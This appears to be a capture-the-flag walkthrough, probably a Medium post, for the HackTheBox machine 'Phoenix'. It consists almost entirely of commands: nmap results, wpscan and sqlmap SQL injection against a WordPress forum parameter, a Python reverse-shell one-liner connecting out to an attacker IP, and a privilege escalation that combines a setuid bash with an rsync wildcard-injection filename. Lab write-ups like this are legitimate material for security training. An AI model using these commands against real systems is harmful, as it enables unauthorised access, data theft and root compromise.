HackTheBox-Phoenix

NMAP

PORT     STATE SERVICE  VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache
|_http-title: Did not follow redirect to https://phoenix.htb/
443/tcp open ssl/http Apache httpd
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache
|_http-title: Did not follow redirect to https://phoenix.htb/
| ssl-cert: Subject: commonName=phoenix.htb/organizationName=Phoenix Security Ltd./stateOrProvinceName=Arizona/countryName=US
| Issuer: commonName=phoenix.htb/organizationName=Phoenix Security Ltd./stateOrProvinceName=Arizona/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-02-15T20:08:43
| Not valid after: 2032-02-13T20:08:43
| MD5: 320f c0ee 2f18 bd78 3abc e9d8 66a6 fc26
|_SHA-1: 6879 3f3b c7d3 a517 6785 bcc7 a726 51ce 8827 4a68
| tls-alpn:
|_ http/1.1
8888/tcp open http SimpleHTTPServer 0.6 (Python 3.8.10)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80/443 (HTTP/HTTPS)

wpscan --url https://phoenix.htb --disable-tls-checks -e ap -v
sqlmap -u "https://phoenix.htb/forum/?subscribe_topic=1" --level=2 --risk=2 --batch
sqlmap -u "https://phoenix.htb/forum/?subscribe_topic=1" --level=2 --risk=2 --sql-query="SELECT optio
n_value FROM wp_options WHERE option_name = 'active_plugins';" --batch

Foothold

python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.124",2222));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

Privilege Escalation (editor)

NOW=$(date +"%Y-%m-%d-%H-%M")
FILE="phoenix.htb.$NOW.tar"
cd /backups
mysqldump -u root wordpress > dbbackup.sql
tar -cf $FILE dbbackup.sql && rm dbbackup.sql
gzip -9 $FILE
find . -type f -mmin +30 -delete
rsync --ignore-existing -t *.* jit@10.11.12.14:/backups/
chmod +s /bin/bash
touch -- "-e sh script.sh"

References

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store